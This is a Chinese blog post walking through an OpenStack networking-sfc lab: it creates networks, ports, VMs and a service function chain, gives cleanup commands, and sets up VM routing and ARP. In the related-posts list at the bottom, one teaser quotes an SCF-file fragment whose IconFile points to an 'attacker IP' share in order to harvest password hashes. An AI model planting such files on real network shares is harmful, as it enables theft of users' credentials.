networking-sfc流程实例解析1

于 2020-12-01 15:36:57 发布
阅读量502 收藏 2
点赞数
文章标签: 云计算
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44088624/article/details/110433178
版权

请添加图片描述
请添加图片描述

openstack测试命令

#创建网络
openstack network create sfc-net-test1
openstack network create sfc-net-test2
openstack network create sfc-net-test3
openstack network create sfc-net-test4
#创建了网
openstack subnet create --network sfc-net-test1 --subnet-range 1.0.0.0/24 sfc-subnet-test1
openstack subnet create --network sfc-net-test2 --subnet-range 2.0.0.0/24 sfc-subnet-test2
openstack subnet create --network sfc-net-test3 --subnet-range 3.0.0.0/24 sfc-subnet-test3
openstack subnet create --network sfc-net-test4 --subnet-range 4.0.0.0/24 sfc-subnet-test4
#创建port
openstack port create --network sfc-net-test1 --enable sfc-port-test0
openstack port create --network sfc-net-test1 --enable sfc-port-test1
openstack port create --network sfc-net-test2 --enable sfc-port-test2
openstack port create --network sfc-net-test2 --enable sfc-port-test3
openstack port create --network sfc-net-test3 --enable sfc-port-test4
openstack port create --network sfc-net-test3 --enable sfc-port-test5
openstack port create --network sfc-net-test4 --enable sfc-port-test6
openstack port create --network sfc-net-test4 --enable sfc-port-test7
#disable security group 和 port security以免影响流量
openstack port set --no-security-group sfc-port-test0
openstack port set --no-security-group sfc-port-test1
openstack port set --no-security-group sfc-port-test2
openstack port set --no-security-group sfc-port-test3
openstack port set --no-security-group sfc-port-test4
openstack port set --no-security-group sfc-port-test5
openstack port set --no-security-group sfc-port-test6
openstack port set --no-security-group sfc-port-test7
openstack port set --disable-port-security sfc-port-test0
openstack port set --disable-port-security sfc-port-test1
openstack port set --disable-port-security sfc-port-test2
openstack port set --disable-port-security sfc-port-test3
openstack port set --disable-port-security sfc-port-test4
openstack port set --disable-port-security sfc-port-test5
openstack port set --disable-port-security sfc-port-test6
openstack port set --disable-port-security sfc-port-test7
#创建flavor
openstack flavor create --ram 4096 --disk 60 --vcpus 4 centos7-flavor
#创建VM
openstack server create --image centos7-hw --flavor centos7-flavor --port sfc-port-test0 sfc-src
openstack server create --image centos7-hw --flavor centos7-flavor --port sfc-port-test1 --port sfc-port-test2 sfc-sf-test1
openstack server create --image centos7-hw --flavor centos7-flavor --port sfc-port-test3 --port sfc-port-test4 sfc-sf-test2
openstack server create --image centos7-hw --flavor centos7-flavor --port sfc-port-test5 --port sfc-port-test6 sfc-sf-test3
openstack server create --image centos7-hw --flavor centos7-flavor --port sfc-port-test7 sfc-dst

#创建port pair,我们的VM就是SF,不支持解释MPLSNSH头,所以correlation用默认的None,weight默认为1,不考虑支持LB
openstack sfc port pair create --ingress sfc-port-test1 --egress sfc-port-test2 port-pair-test1
openstack sfc port pair create --ingress sfc-port-test3 --egress sfc-port-test4 port-pair-test2
openstack sfc port pair create --ingress sfc-port-test5 --egress sfc-port-test6 port-pair-test3
#创建port pair group,一个group包含不对port pair,简单测试不支持LB
openstack sfc port pair group create --port-pair port-pair-test1 port-pair-group-test1
openstack sfc port pair group create --port-pair port-pair-test2 port-pair-group-test2
openstack sfc port pair group create --port-pair port-pair-test3 port-pair-group-test3
#创建流量classifier,一定要指定--logical-source-port,从哪一个口出来的流量开始走port chain
openstack sfc flow classifier create --source-ip-prefix 1.0.0.0/24 --destination-ip-prefix 4.0.0.0/24 --logical-source-port sfc-port-test0 --logical-destination-port sfc-port-test7 sfc-flow-class-test1
#创建port chain,因为网线拓扑简单,流量简单,指定为对称的
openstack sfc port chain create --chain-parameters symmetric=true --flow-classifier sfc-flow-class-test1 --port-pair-group port-pair-group-test1 --port-pair-group port-pair-group-test2 --port-pair-group port-pair-group-test3 sfc-port-chain-test1

清除环境命令

openstack sfc port chain delete sfc-port-chain-test1
penstack sfc flow classifier delete sfc-flow-class-test1
openstack sfc port pair group delete port-pair-group-test1
openstack sfc port pair group delete port-pair-group-test2
openstack sfc port pair group delete port-pair-group-test3
openstack sfc port pair delete port-pair-test1
openstack sfc port pair delete port-pair-test2
openstack sfc port pair delete port-pair-test3
openstack server delete sfc-src
openstack server delete sfc-sf-test1
openstack server delete sfc-sf-test2
openstack server delete sfc-sf-test3
openstack server delete sfc-dst
openstack port delete sfc-port-test0
openstack port delete sfc-port-test1
openstack port delete sfc-port-test2
openstack port delete sfc-port-test3
openstack port delete sfc-port-test4
openstack port delete sfc-port-test5
openstack port delete sfc-port-test6
openstack port delete sfc-port-test7

配置虚拟机sfc-src,sfc-sf-test1,sfc-sf-test2,sfc-sf-test3,sfc-dst

关闭所有主机的iptables,以及firewalld
# systemctl stop firewalld
# systemctl stop iptables
 
在sfc-src上配置ARP:
# arp -s 1.0.0.1 fa:16:3e:ee:ee:ee
 
在sfc-sf-test1,sfc-sf-test2上配置路由转发, 把eth0的流量转发到eth1上去:
# echo 1 > /proc/sys/net/ipv4/ip_forward
# ip route add 4.0.0.0/24 dev eth1
# arp -s 4.0.0.213 fa:16:3e:ee:ee:dd    #这里得IP为sfc-dst实例IP

在sfc-sf-test3上配置路由转发, 把eth0的流量转发到eth1上去:
# echo 1 > /proc/sys/net/ipv4/ip_forward

这里特别注意:sfc-sf-test3不用配置route和arp

其次:双向流程还需要配置返回路由。
在sfc-des上配置ARP:
#arp -s 1.0.0.1 fa:16:3e:ee:ee:cc

在sfc-sf-test2,sfc-sf-test3上配置路由转发, 把eth0的流量转发到eth1上去:
# ip route add 1.0.0.0/24 dev eth0
# arp -s 1.0.0.10 fa:16:3e:ee:ee:dd       #这里得IP为sfc-src实例IP

最后ping 测试

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

zhangl0726
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
OpenStack 业务链networking-sfc介绍 (1) - 概述
赤焰军
03-24 6945
1.  Service Function Chain概述    Neutron的SFC (Service Function Chaining, SFC, 业务链)是由华为主导并开发的一个neutron下的服务框架。    其目的是动态建立服务链使不同租户的流量可以按照不同顺序导向不同的服务功能模块。其概念类似于策略路由, 即SFC使网络报文流量走特定的路径,而不是通过IP目的地址来查看路由表得
OpenStack 业务链networking-sfc介绍 (3) - 底层原理
赤焰军
03-24 8108
1.  SFC底层实现原理 port chain和ovs driver/agent Port Chain插件架构图:       SFC Port Chain Plugin       +-------------------------------+       |  +-------------------------+  |       |  |    Port
python-networking-sfc-doc-6.0.0-1.el7.noarch.rpm
12-13
官方离线安装包,亲测可用。使用rpm -ivh [rpm完整包名] 进行安装
SFC编程典型案例.rar
06-03
PLC程序,三菱PLC
SFC编程典型案例.zip
06-04
SFC编程典型案例.zipSFC编程典型案例.zip
python3-networking-sfc-9.0.1-1.el8.noarch.rpm
12-06
官方离线安装包,亲测可用
python3-networking-sfc-9.0.0-1.el8.noarch.rpm
12-06
官方离线安装包,亲测可用
python-networking-sfc-doc-9.0.1-1.el8.noarch.rpm
01-02
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
python-networking-sfc-doc-9.0.1-1.el7.noarch.rpm
01-02
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
Networking-sfc安装流程
wuliangtianzu的博客
11-02 965
Networking-sfc安装流程   一.版本 Networking-sfc版本与openstack版本对应关系: Ocata: latest 4.0.x version Newton: latest 3.0.x version Mitaka: latest 2.0.x version   二.安装 安装Newton 版openstack如下: pip install
倍福SFC编程示例
08-09
倍福PLC sfc编程实例,倍福PLC sfc编程实例,倍福PLC sfc编程实例
三菱SFC程序实例 可以极大提高编程效率
04-11
三菱SFC程序实例 可以极大提高编程效率
如何用 SFC1 (READ_CLK) 读取时间和日期以及如何用 SFC0 (SET_CLK) 设定系统时间?
12-19
如何用 SFC1 (READ_CLK) 读取时间和日期以及如何用 SFC0 (SET_CLK) 设定系统时间?
SFC 编程规则(入门级PLC编程教程)
05-19
SFC编程总则 A. 三要素:驱动负载、转移条件、转移目标。转移条件、转移目标二者不可缺,驱动负载视具体情况而定。 B. 先驱动负载,后状态转移,不可颠倒。 C. 顺序不连续的转移用OUT指令进行状态转移
三菱SFC步进图工程实例 用三菱PLC一定要会SFC
02-02
三菱SFC步进图工程实例 用三菱PLC一定要会SFC 它适用流程步进工序。
OpenStack 业务链networking-sfc介绍 (2) - 底层原理
weixin_30889885的博客
05-12 345
原文链接:https://blog.csdn.net/bc_vnetwork/article/details/65630475 1.SFC底层实现原理 port chain和ovs driver/agent Port Chain插件架构图: SFC Port Chain Plugin +-----------------------...
OpenStack 业务链networking-sfc介绍 (2) - 部署方法
赤焰军
03-24 2989
作者: 赵怡 1.  SFC安装部署 前提条件: ovs版本: 由于sfc会用到ovs的group bucket, mpls特性, 所以需要ovs支持mpls。笔者用的ovs 2.6.1就可以支持。 目前代码可以手工安装, 也可以通过devstack自动安装:   local.conf中需要启用networking-sfc插件 ... enable_p
利用sfc文件构建网络渗透
weixin_30718391的博客
03-23 123
收集哈希 SCF(Shell命令文件)文件可用于执行一组有限的操作,例如显示Windows桌面或打开Windows资源管理器,这并不是什么新鲜事。然而,一个SCF文件可以用来访问一个特定的UNC路径,允许渗透测试人员构建攻击。下面的代码可以被放置在一个文本文件,然后需要被植入到网络共享。 代码: [Shell] Command=2 IconFile=\\攻击者的IP\share\pen...
containernetworking-plugins-0.8.6是干啥用的
最新发布
06-03
`containernetworking-plugins-0.8.6`是一个CNI插件集合,用于Kubernetes中的容器网络功能。这个插件集合包含了多个CNI插件,包括网络插件和CNI-IPAM插件,用于创建和管理Kubernetes集群中的容器网络。 在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值